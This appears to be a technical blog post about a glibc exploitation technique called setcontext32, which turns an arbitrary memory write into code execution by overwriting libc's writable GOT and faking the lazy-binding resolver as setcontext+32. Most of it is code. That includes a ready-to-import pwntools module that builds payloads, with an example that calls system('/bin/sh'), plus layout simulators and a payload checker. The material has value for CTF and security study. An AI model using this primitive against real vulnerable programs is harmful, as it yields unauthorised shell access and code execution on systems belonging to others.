# modern arb write -> rce is hard
Currently, converting an arbitrary write primitive into RCE is a messy process. The good old days of `__free_hook` are long gone. Now you have to leak the pointer mangling cookie to modify an existing `__exit_funcs` entry, or compute the offset to `ld.so` to overwrite `l_addr` and create a fake `DT_FINI` entry, or set up special `_codecvt` and `_wide_data` structures on hijacked IO objects... I'd just like to specify the function I want to call and its arguments!
I want a *flexible* RCE primitive. I don't want to rely on `_IO_cleanup`, `_dl_fini`, or `malloc` to call my injected code. I want an inherently universal gadget, one I can expect to be called even with the most messed-up heap bins and broken IO objects. I want to call any function with any set of arguments without needing to stack pivot or pray that the stack is aligned when `system` runs. I don't want to satisfy several constraints just so `one_gadget` will work!
# setcontext32
setcontext32 is a neat method for converting an arbitrary write into flexible arbitrary code execution. Roughly, it looks like:
```python=
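write(libc_write_address, flat(
    p64(0),
    p64(libc_write_address + 0x218),  # fake link map -> the ucontext below
    p64(setcontext+32),               # fake runtime resolver
    p64(libc_exe_address) * 0x40,     # GOT slots -> PLT trampoline
    cpu_state_information,            # ucontext_t, lands at libc_write_address + 0x218
))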
```
Here `libc_write_address` is the start of the writeable page in libc (where libc's GOT begins), `libc_exe_address` is the start of the executable page in libc (where the PLT trampoline lives), and `cpu_state_information` is a `ucontext_t` structure holding the register values to load, including `rsp` and `rip`.
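To make the layout concrete, here is a stdlib-only sketch of the same payload built with `struct` instead of pwntools. It assumes the first three qwords are the GOT header slots and that exactly `0x40` slots get overwritten, as in the snippet above. `build_layout` is a hypothetical helper, and every address is an arbitrary placeholder rather than a real libc offset.

```python
import struct

# Stdlib-only sketch of the rough payload. All addresses are placeholders.
HEADER_SLOTS = 3      # GOT[0], GOT[1] (link map), GOT[2] (resolver)
NUM_GOT_SLOTS = 0x40  # how many GOT entries the payload overwrites


def build_layout(write_addr: int, exe_addr: int, setcontext32: int, ucontext: bytes) -> bytes:
    """Three header qwords, 0x40 pointers to the PLT trampoline, then the ucontext."""
    ucontext_addr = write_addr + (HEADER_SLOTS + NUM_GOT_SLOTS) * 8
    header = struct.pack("<QQQ", 0, ucontext_addr, setcontext32)
    slots = struct.pack("<Q", exe_addr) * NUM_GOT_SLOTS
    return header + slots + ucontext


# (3 + 0x40) * 8 = 0x18 + 0x200 = 0x218: the ucontext starts right after the slots.
print(hex((HEADER_SLOTS + NUM_GOT_SLOTS) * 8))  # 0x218

payload = build_layout(0x7F0000219000, 0x7F0000028000, 0x7F0000053A6D, bytes(0x200))
print(hex(len(payload)))  # 0x418
```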
## high-level overview
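Every GOT entry in libc, such as those for `memset`, `memcpy`, `strcpy`, and `strlen`, is replaced with the address of the PLT trampoline, which starts at the beginning of the executable page. The PLT trampoline pushes the link map stored in GOT[1] and jumps to the runtime resolver stored in GOT[2]. Those two slots sit at the very beginning of the writeable page, so the payload replaces them with a fake link map, `libc_write_address + 0x218`, and a fake runtime resolver, `setcontext+32`. The `0x218` is simply where the `ucontext_t` ends up: past the three header qwords and the 0x40 overwritten slots, `(3 + 0x40) * 8 = 0x218`.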
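The dispatch can be modelled as a toy simulation in Python. This is not an emulator. Memory is a dict of qwords, the addresses are placeholders, and `call_via_got` is a hypothetical stand-in for an internal libc call such as `memcpy`. It only shows what ends up on the stack and where control lands.

```python
# Toy model of the hijacked lazy-binding path. Memory is a dict of qwords and
# every address below is a made-up placeholder, not a real libc offset.
GOT = 0x1000           # stands in for libc_write_address (start of the GOT)
PLT0 = 0x2000          # stands in for libc_exe_address (the PLT trampoline)
SETCONTEXT32 = 0x3020  # stands in for setcontext+32
NUM_SLOTS = 0x40


def apply_payload(mem: dict) -> None:
    """Write the three header qwords and point every GOT slot at PLT0."""
    mem[GOT] = 0
    mem[GOT + 8] = GOT + 0x218    # GOT[1]: fake link map
    mem[GOT + 16] = SETCONTEXT32  # GOT[2]: fake resolver
    for i in range(NUM_SLOTS):
        mem[GOT + 0x18 + i * 8] = PLT0


def call_via_got(mem: dict, stack: list, slot: int, ret_addr: int) -> int:
    """Model an internal libc call through GOT slot `slot`; return where control lands."""
    stack.append(ret_addr)  # `call` pushes the return address
    target = mem[GOT + 0x18 + slot * 8]
    if target != PLT0:
        return target  # untouched slot: the real function would run
    # PLT0: push [GOT+8]; jmp [GOT+16]
    stack.append(mem[GOT + 8])
    return mem[GOT + 16]


mem, stack = {}, []
apply_payload(mem)
pc = call_via_got(mem, stack, slot=5, ret_addr=0x4444)  # the slot index is arbitrary
print(hex(pc), hex(stack[-1]))  # 0x3020 0x1218
```

The fake link map ends up on top of the stack, directly above the caller's return address. That is the value `setcontext+32` consumes next.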
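`setcontext+32` skips the `rt_sigprocmask` syscall at the top of `setcontext` and lands on the `pop rdx` that normally recovers its argument (at least on recent x86-64 glibc). It therefore pops `libc_write_address + 0x218` off the stack and treats it as a pointer to a saved `ucontext_t`. It then loads your structure as the current CPU state: the general-purpose registers, `rsp`, and finally `rip`, which it pushes onto the new stack and `ret`s into.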
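Here is a rough model of how `setcontext` interprets the structure. The offsets are the x86-64 glibc `ucontext_t` offsets already used by `create_ucontext` in the code section. `decode_context` and `entry_stack_aligned` are hypothetical helpers for inspecting a context offline, not part of glibc. Because `setcontext` pushes the saved `rip` and `ret`s into it, the target function starts with exactly the saved `rsp`, which is why choosing `rsp` is enough to control stack alignment.

```python
import struct

# ucontext_t offsets read by x86-64 glibc's setcontext (the same ones
# create_ucontext in the code section writes).
REG_OFFSETS = {
    "r8": 0x28, "r9": 0x30, "r12": 0x48, "r13": 0x50, "r14": 0x58,
    "r15": 0x60, "rdi": 0x68, "rsi": 0x70, "rbp": 0x78, "rbx": 0x80,
    "rdx": 0x88, "rcx": 0x98, "rsp": 0xA0, "rip": 0xA8,
}
FPREGS_PTR_OFFSET = 0xE0  # pointer passed to fldenv: must be readable
MXCSR_OFFSET = 0x1C0      # 32-bit value passed to ldmxcsr: 0x1F80 is the default


def decode_context(ctx: bytes) -> dict:
    """Return the values setcontext would load from ctx."""
    regs = {name: struct.unpack_from("<Q", ctx, off)[0] for name, off in REG_OFFSETS.items()}
    regs["fpregs"] = struct.unpack_from("<Q", ctx, FPREGS_PTR_OFFSET)[0]
    regs["mxcsr"] = struct.unpack_from("<I", ctx, MXCSR_OFFSET)[0]
    return regs


def entry_stack_aligned(regs: dict) -> bool:
    """`push rip; ret` leaves rsp equal to the saved rsp when the target starts.
    The SysV x86-64 ABI expects (rsp + 8) % 16 == 0 at a function's entry."""
    return (regs["rsp"] + 8) % 16 == 0


ctx = bytearray(0x200)
struct.pack_into("<Q", ctx, REG_OFFSETS["rip"], 0xDEADBEEF)
struct.pack_into("<Q", ctx, REG_OFFSETS["rdi"], 0x1234)
struct.pack_into("<Q", ctx, REG_OFFSETS["rsp"], 0x7F0000221208)  # placeholder stack
regs = decode_context(bytes(ctx))
print(hex(regs["rip"]), hex(regs["rdi"]), entry_stack_aligned(regs))  # 0xdeadbeef 0x1234 True
```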
Most libc functions reach one of these hijacked GOT entries internally, so calling most libc functions will trigger setcontext32, including `malloc`, `exit`, and (almost?) every IO operation.
## why
libc's GOT is writeable so that you may use architecture-specific functions, such as a `memcpy` optimized for SSE or AVX512. A friend also guessed that it could be for `ltrace`. I learned that libc's GOT was writeable from pwndbg creator [disconnect3d](https://twitter.com/disconnect3d_pl).
## code
Here's code you can readily import to generate setcontext32 payloads (or integrate into your pwn libraries). An example is in the `__main__` block at the bottom.
`setcontext32.py`
```python=
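from pwn import *


def create_ucontext(
    src: int,
    rsp=0,
    rbx=0,
    rbp=0,
    r12=0,
    r13=0,
    r14=0,
    r15=0,
    rsi=0,
    rdi=0,
    rcx=0,
    r8=0,
    r9=0,
    rdx=0,
    rip=0xDEADBEEF,
) -> bytearray:
    """Build a fake x86-64 ucontext_t for setcontext to load (glibc offsets)."""
    b = bytearray(0x200)
    b[0xE0:0xE8] = p64(src)  # fpregs pointer: setcontext runs fldenv on it, so it must be readable
    b[0x1C0:0x1C8] = p64(0x1F80)  # MXCSR for ldmxcsr (0x1F80 is the default value)
    b[0xA0:0xA8] = p64(rsp)
    b[0x80:0x88] = p64(rbx)
    b[0x78:0x80] = p64(rbp)
    b[0x48:0x50] = p64(r12)
    b[0x50:0x58] = p64(r13)
    b[0x58:0x60] = p64(r14)
    b[0x60:0x68] = p64(r15)
    b[0xA8:0xB0] = p64(rip)  # pushed onto the new stack, then ret'd into
    b[0x70:0x78] = p64(rsi)
    b[0x68:0x70] = p64(rdi)
    b[0x98:0xA0] = p64(rcx)
    b[0x28:0x30] = p64(r8)
    b[0x30:0x38] = p64(r9)
    b[0x88:0x90] = p64(rdx)
    return b


def setcontext32(libc: ELF, **kwargs) -> tuple[int, bytes]:
    """Return (address to write to, payload). Set libc.address to the leaked base first."""
    got = libc.address + libc.dynamic_value_by_tag("DT_PLTGOT")  # start of libc's writeable GOT
    plt_trampoline = libc.address + libc.get_section_by_name(".plt").header.sh_addr
    # Default to a scratch stack in writeable libc memory; callers may pass their own rsp.
    kwargs.setdefault("rsp", libc.symbols["environ"] + 8)
    return got, flat(
        p64(0),  # GOT[0]
        p64(got + 0x218),  # GOT[1]: fake link map -> the ucontext below
        p64(libc.symbols["setcontext"] + 32),  # GOT[2]: fake runtime resolver
        p64(plt_trampoline) * 0x40,  # every GOT slot -> PLT trampoline
        bytes(create_ucontext(got + 0x218, **kwargs)),  # at got + (3 + 0x40) * 8
    )


if __name__ == "__main__":
    libc = ELF("./libc.so.6")
    # libc.address = <leaked libc base>  # rebase before using the payload for real
    dest, payload = setcontext32(
        libc, rip=libc.sym["system"], rdi=next(libc.search(b"/bin/sh"))
    )
    print(hex(dest), payload.hex())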
```
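Before firing the write, it can be worth sanity-checking the generated payload. The following is a hypothetical stdlib-only checker, not part of the module above. It assumes the exact layout `setcontext32()` produces (ucontext at offset `0x218`, `0x40` trampoline slots), and the addresses in the usage lines are made-up placeholders.

```python
import struct

UCONTEXT_OFFSET = 0x218  # 3 header qwords + 0x40 GOT slots


def check_setcontext32_payload(dest: int, payload: bytes, trampoline: int, setcontext32: int) -> dict:
    """Validate the setcontext32 layout and return a few decoded ucontext fields.

    Raises ValueError if the payload does not match the expected layout.
    """

    def q(off: int) -> int:
        return struct.unpack_from("<Q", payload, off)[0]

    def expect(cond: bool, msg: str) -> None:
        if not cond:
            raise ValueError(msg)

    ctx = dest + UCONTEXT_OFFSET
    expect(len(payload) >= UCONTEXT_OFFSET + 0x1C8, "payload too short to hold the ucontext")
    expect(q(0x08) == ctx, "GOT[1] (fake link map) must point at the ucontext")
    expect(q(0x10) == setcontext32, "GOT[2] (fake resolver) must be setcontext+32")
    expect(all(q(0x18 + i * 8) == trampoline for i in range(0x40)), "every slot must point at PLT0")
    # Readability can't be checked offline; non-null is the best we can do here.
    expect(q(UCONTEXT_OFFSET + 0xE0) != 0, "fldenv pointer must be non-null")
    expect(q(UCONTEXT_OFFSET + 0x1C0) & 0xFFFFFFFF == 0x1F80, "MXCSR should be 0x1F80")
    fields = (("rip", 0xA8), ("rdi", 0x68), ("rsp", 0xA0))
    return {name: q(UCONTEXT_OFFSET + off) for name, off in fields}


# Placeholder addresses; build a minimal well-formed payload by hand.
dest, trampoline, sc32 = 0x219000, 0x28000, 0x53A6D
payload = bytearray(0x418)
struct.pack_into("<QQ", payload, 0x08, dest + UCONTEXT_OFFSET, sc32)
for i in range(0x40):
    struct.pack_into("<Q", payload, 0x18 + i * 8, trampoline)
struct.pack_into("<Q", payload, UCONTEXT_OFFSET + 0xE0, dest + UCONTEXT_OFFSET)
struct.pack_into("<Q", payload, UCONTEXT_OFFSET + 0x1C0, 0x1F80)
struct.pack_into("<Q", payload, UCONTEXT_OFFSET + 0xA8, 0x50D70)  # rip
print(check_setcontext32_payload(dest, bytes(payload), trampoline, sc32))
```

Against the module's real output, you would pass the trampoline and `setcontext+32` addresses computed the same way `setcontext32()` computes them, e.g. `libc.symbols["setcontext"] + 32`.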